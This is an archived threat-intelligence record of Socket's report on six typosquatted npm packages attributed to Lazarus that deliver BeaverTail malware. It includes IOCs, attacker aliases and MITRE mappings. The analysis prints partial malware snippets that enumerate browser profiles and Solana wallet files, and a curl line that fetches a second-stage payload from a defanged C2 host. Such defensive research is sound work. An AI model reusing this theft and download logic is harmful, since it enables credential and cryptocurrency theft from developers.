{
	"id": "157871f6-9927-4682-a7e0-eea3c7892667",
	"created_at": "2026-04-06T03:37:01.970276Z",
	"updated_at": "2026-04-10T03:38:20.416647Z",
	"deleted_at": null,
	"sha1_hash": "5a761631ccb4e063d1ef272238faf829f3d67180",
	"title": "Lazarus Strikes npm Again with New Wave of Malicious Package...",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 859969,
	"plain_text": "Lazarus Strikes npm Again with New Wave of Malicious Package...\r\nArchived: 2026-04-06 03:23:08 UTC\r\nNorth Korea’s Lazarus Group continues to infiltrate the npm ecosystem, deploying six new malicious packages\r\ndesigned to compromise developer environments, steal credentials, extract cryptocurrency data, and deploy a\r\nbackdoor. In this campaign, Socket researchers uncovered BeaverTail malware embedded within seemingly\r\nbenign packages — is-buffer-validator , yoojae-validator , event-handle-package , array-empty-validator , react-event-dependency , and auth-validator — each closely mirroring tactics previously\r\nhttps://socket.dev/blog/lazarus-strikes-npm-again-with-a-new-wave-of-malicious-packages\r\nPage 1 of 9\n\ndocumented in Lazarus (Contagious Interview) operations. These findings align with the Socket Threat Research\r\nTeam’s January 2025 report on the Lazarus APT group’s ongoing supply chain compromises.\r\nThe six new packages — collectively downloaded over 330 times — closely mimic the names of widely trusted\r\nlibraries, employing a well-known typosquatting tactic used by Lazarus-linked threat actors to deceive developers.\r\nAdditionally, the APT group created and maintained GitHub repositories for five of the malicious packages,\r\nlending an appearance of open source legitimacy and increasing the likelihood of the harmful code being\r\nintegrated into developer workflows.\r\nAs of this writing, the packages remain live on the npm registry. We have petitioned their removal and reported\r\nthe associated GitHub repositories and user accounts.\r\nLazarus: Can’t Stop, Won’t Stop With Malicious Packages\r\nAttributing this attack definitively to Lazarus or a sophisticated copycat remains challenging, as absolute\r\nattribution is inherently difficult. 
However, the tactics, techniques, and procedures (TTPs) observed in this npm\r\nattack closely align with Lazarus’s known operations, extensively documented by researchers from Unit42,\r\neSentire, DataDog, Phylum, and others since 2022.\r\nThis campaign exhibits numerous hallmarks of Lazarus’ methodology in deploying malicious packages, including:\r\nThe use of identical obfuscation techniques and tooling observed in previous Lazarus campaigns\r\nCross-platform targeting of Windows, macOS, and Linux systems\r\nDeployment of BeaverTail malware along with the second-stage InvisibleFerret backdoor\r\nScript functionality, structure, and malicious intent closely resembling past Lazarus operations\r\nA command and control (C2) mechanism that follows the same pattern, utilizing newly acquired endpoints\r\nspecific to this campaign\r\nData theft tactics consistent with Lazarus’s previous supply chain compromises\r\nPersistence mechanisms aligned with prior Lazarus activity, further reinforcing the likelihood of their\r\ninvolvement\r\nThe following is a detailed breakdown of the malicious packages, including their associated npm aliases, email\r\naddresses, download counts, and linked GitHub repositories and accounts.\r\n1. is-buffer-validator : Published under the npm alias “edan0831” (email: edanjohn1991@gmail.com),\r\nthis package has been downloaded 52 times. Its source code is hosted on GitHub at\r\ngithub.com/edan0831/is-buffer-validator, under the edan0831 GitHub account.\r\n2. yoojae-validator : Published under the npm alias “hottblaze” (email: hottblaze012@gmail.com), this\r\npackage has 55 downloads. The corresponding GitHub repository is github.com/alximmykola379/yoojae-validator, associated with the alximmykola379 GitHub account.\r\n3. event-handle-package : Published under the npm alias “ricardoalexis07” (email:\r\nricardoalexis0629@gmail.com), this package has been downloaded 54 times. Unlike the others, it has no\r\npublicly linked GitHub repository.\r\n4. 
array-empty-validator : Published under the npm alias “alextucker0519” (email:\r\nalextucker@softworldnet.com), this package has 59 downloads. The corresponding GitHub repository is\r\ngithub.com/alextucker0519/array-empty-validator, under the alextucker0519 GitHub account.\r\n5. react-event-dependency : Published under the npm alias “elondavid” (email: elondavid888@gmail.com),\r\nthis package has 57 downloads. Its GitHub repository is available at github.com/elondavid888/react-event-dependency, linked to the elondavid888 account.\r\n6. auth-validator : Published under the npm alias “kevin_tr” (email: robustplutus@gmail.com), this\r\npackage has 54 downloads. While its original GitHub repository (github.com/kevin-tra/auth-validator) has\r\nsince been removed, historical records tie it to the kevin-tra GitHub account.\r\nSocket AI Scanner identified all six packages as malicious.\r\nAcross these packages, Lazarus uses names that closely mimic legitimate and widely trusted libraries, a hallmark\r\nof typosquatting tactics. For example, is-buffer-validator closely resembles the widely used is-buffer\r\nmodule authored by Socket CEO Feross Aboukhadijeh. Notably, the Socket Threat Research Team had previously\r\ndocumented Lazarus’ malicious npm activities in its January 2025 report. This resemblance may suggest the threat\r\nactor’s awareness of Socket’s research or a strategic attempt to exploit the established trust and widespread\r\nadoption of a legitimate library through typosquatting. 
What a coincidence.\r\nThe legitimate is-buffer package, authored by Feross Aboukhadijeh and maintained for over a\r\ndecade, has 33 million weekly downloads and has been downloaded over 134 million times overall,\r\nhighlighting its widespread adoption.\r\nTechnical Analysis\r\nThe code embedded within the malicious npm packages demonstrates the obfuscation techniques observed in\r\nearlier Lazarus-linked campaigns. It employs self-invoking functions, dynamic function constructors, and array\r\nshifting to obscure its true functionality. Despite these layers of concealment, the malware’s objectives align with\r\npreviously documented Lazarus operations, which have consistently leveraged multi-stage payload delivery and\r\npersistence mechanisms to maintain long-term access to compromised systems.\r\nThe code is designed to collect system environment details, including the hostname, operating system, and system\r\ndirectories. It systematically iterates through browser profiles to locate and extract sensitive files such as Login\r\nData from Chrome, Brave, and Firefox, as well as keychain archives on macOS. 
Notably, the malware also\r\ntargets cryptocurrency wallets, specifically extracting id.json from Solana and exodus.wallet from Exodus.\r\nThe stolen data is then exfiltrated to a hardcoded C2 server at hxxp://172.86.84[.]38:1224/uploads , following\r\nLazarus’s well-documented strategy of harvesting and transmitting compromised information.\r\nBelow is a code snippet demonstrating the malicious process of extracting and exfiltrating sensitive data, with\r\ninline comments explaining key functions and objectives:\r\n// Enumerate user profiles and extract browser data\r\nasync function uploadFiles(basePath, prefix, includeSolana, timestamp) {\r\n // basePath: Root directory (e.g., Chrome/Brave user data)\r\n // prefix: Identifier for exfiltrated files\r\n // includeSolana: Flag to collect Solana wallet keys\r\n // timestamp: Tracks exfiltration timing\r\n if (!testPath(basePath)) return; // Skip if directory is inaccessible\r\n // Scan up to 200 browser profiles\r\n for (let i = 0; i \u003c 200; i++) {\r\n const profileDir = `${basePath}/${i === 0 ? 'Default' : 'Profile ' + i}/Local Extension Settings`;\r\n // Look for known extension data (e.g., MetaMask, Exodus)\r\n // Capture .log and .ldb files\r\n }\r\n if (includeSolana) {\r\n // Locate Solana's id.json private key file\r\n const solanaPath = `${homeDir}/.config/solana/id.json`;\r\n if (fs.existsSync(solanaPath)) {\r\n // Extract and exfiltrate Solana wallet data\r\n }\r\n }\r\n // Upload stolen data to the C2 server\r\n}\r\nBeyond the silent enumeration and data exfiltration detailed above, the script also downloads additional malicious\r\ncomponents — specifically identified as the InvisibleFerret backdoor — using both curl commands and the\r\nNode.js request module. 
The secondary payload (SHA256:\r\n6a104f07ab6c5711b6bc8bf6ff956ab8cd597a388002a966e980c5ec9678b5b0 ) is downloaded under the filenames\r\np.zi or p2.zip and extracted using tar -xf , following a multi-stage deployment strategy consistent with\r\nprevious Lazarus campaigns that distributed the BeaverTail malware. The following snippet illustrates one stage\r\nof this process:\r\n// Fetch additional malware if p.zi is missing or incomplete\r\nfunction runP() {\r\n const pFile = `${tmpDir}\\\\p.zi`;\r\n const p2File = `${tmpDir}\\\\p2.zip`;\r\n if (fs.existsSync(pFile)) {\r\n // Check file size; rename to .zip for extraction or retry download\r\n } else {\r\n // Download payload from C2 using curl\r\nex(`curl -Lo \"${pFile}\" \"hxxp://172.86.84[.]38:1224/pdown\"`, (error) =\u003e {\r\n if (!error) {\r\n // Set file size, rename to p2.zip, and extract\r\n }\r\n });\r\n }\r\n}\r\nThrough these stages, Lazarus consistently prioritizes persistence and stealth. The script’s objectives go beyond\r\ncredential theft, seeking to embed itself within development workflows and ensuring continued compromise, even\r\nif one stage is detected and removed. By creating or repurposing GitHub repositories for the malicious packages,\r\nthe threat actor further obscures its activities, making the operation appear as part of legitimate open source\r\ndevelopment.\r\nOutlook and Recommendations\r\nWe assess that Lazarus and other advanced adversaries will continue to refine their infiltration tactics. Obfuscation\r\ntechniques are likely to evolve, incorporating more sophisticated code-hiding methods and deeper integration into\r\nlegitimate development workflows. 
Threat actors may also broaden their targeting to additional packages and\r\necosystems to expand their reach among developers, making early detection and contextual dependency scanning\r\nmore critical than ever.\r\nTo mitigate these threats, organizations should implement a multi-layered approach to detection and defense.\r\nAutomated dependency auditing and code reviews can help identify anomalies in third-party packages,\r\nparticularly those with low download counts or from unverified sources. Continuous monitoring of unusual\r\ndependency changes can expose malicious updates, while blocking outbound connections to known C2 endpoints\r\nprevents data exfiltration. Sandboxing untrusted code in controlled environments and deploying endpoint\r\nprotection can detect suspicious file system or network activities. Additionally, educating development teams on\r\ncommon typosquatting tactics promotes vigilance and reinforces proper vetting before installing new packages.\r\nDespite extensive obfuscation techniques — including variable renaming, string encoding, and control flow\r\nflattening — Socket’s static and behavioral analysis effectively identified all six packages as malware. The Socket\r\nGitHub app enables real-time scanning of pull requests, alerting developers to suspicious or malicious\r\ndependencies before integration. Additionally, incorporating the Socket CLI into npm installation workflows helps\r\ndetect anomalies before they reach production, while the Socket browser extension proactively warns users of\r\npotential threats upon download or viewing. 
By embedding these security measures into existing development\r\nworkflows, organizations can significantly mitigate the risk of supply chain attacks.\r\nSocket AI Scanner’s analysis, including contextual details about the malicious is-buffer-validator\r\npackage.\r\nIndicators of Compromise (IOCs)\r\nMalicious npm Packages\r\nis-buffer-validator\r\nyoojae-validator\r\nevent-handle-package\r\narray-empty-validator\r\nreact-event-dependency\r\nauth-validator\r\nThreat Actor Identifiers\r\nnpm Aliases and Email Addresses:\r\nedan0831 — edanjohn1991@gmail.com\r\nhottblaze — hottblaze012@gmail.com\r\nricardoalexis07 — ricardoalexis0629@gmail.com\r\nalextucker0519 — alextucker@softworldnet.com\r\nelondavid — elondavid888@gmail.com\r\nkevin_tr — robustplutus@gmail.com\r\nGitHub Accounts:\r\nedan0831\r\nalximmykola379\r\nalextucker0519\r\nelondavid888\r\nkevin-tra\r\nMalicious GitHub Repositories\r\ngithub.com/edan0831/is-buffer-validator\r\ngithub.com/alximmykola379/yoojae-validator\r\ngithub.com/alextucker0519/array-empty-validator\r\ngithub.com/elondavid888/react-event-dependency\r\ngithub.com/kevin-tra/auth-validator (defunct)\r\nCommand and Control (C2) Endpoints\r\nPrimary C2 Server: 172.86.84[.]38\r\nAssociated Endpoints:\r\nhxxp://172.86.84[.]38:1224/uploads\r\nhxxp://172.86.84[.]38:1224/pdown\r\nhxxp://172.86.84[.]38:1224/client/9/902\r\nSHA256 Hash\r\n6a104f07ab6c5711b6bc8bf6ff956ab8cd597a388002a966e980c5ec9678b5b0\r\nMITRE ATT\u0026CK Techniques\r\nT1195.002 — Supply Chain Compromise: Compromise Software Supply Chain\r\nT1608.001 — Stage Capabilities: Upload Malware\r\nT1204.002 — User Execution: Malicious File\r\nT1059.007 — Command and Scripting Interpreter: JavaScript\r\nT1027.013 — Obfuscated Files or Information: Encrypted/Encoded 
File\r\nT1546.016 — Event Triggered Execution: Installer Packages\r\nT1005 — Data from Local System\r\nT1082 — System Information Discovery\r\nT1083 — File and Directory Discovery\r\nT1217 — Browser Information Discovery\r\nT1555.003 — Credentials from Password Stores: Credentials from Web Browsers\r\nT1555.001 — Credentials from Password Stores: Keychain\r\nT1041 — Exfiltration Over C2 Channel\r\nT1105 — Ingress Tool Transfer\r\nT1119 — Automated Collection\r\nT1657 — Financial Theft\r\nSource: https://socket.dev/blog/lazarus-strikes-npm-again-with-a-new-wave-of-malicious-packages",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://socket.dev/blog/lazarus-strikes-npm-again-with-a-new-wave-of-malicious-packages"
	],
	"report_names": [
		"lazarus-strikes-npm-again-with-a-new-wave-of-malicious-packages"
	],
	"threat_actors": [
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "4fc99d9b-9b66-4516-b0db-520fbef049ed",
			"created_at": "2025-10-29T02:00:51.949631Z",
			"updated_at": "2026-04-10T02:00:05.346203Z",
			"deleted_at": null,
			"main_name": "Contagious Interview",
			"aliases": [
				"Contagious Interview",
				"DeceptiveDevelopment",
				"Gwisin Gang",
				"Tenacious Pungsan",
				"DEV#POPPER",
				"PurpleBravo",
				"TAG-121"
			],
			"source_name": "MITRE:Contagious Interview",
			"tools": [
				"InvisibleFerret",
				"BeaverTail",
				"XORIndex Loader",
				"HexEval Loader"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775446621,
	"ts_updated_at": 1775792300,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5a761631ccb4e063d1ef272238faf829f3d67180.pdf",
		"text": "https://archive.orkl.eu/5a761631ccb4e063d1ef272238faf829f3d67180.txt",
		"img": "https://archive.orkl.eu/5a761631ccb4e063d1ef272238faf829f3d67180.jpg"
	}
}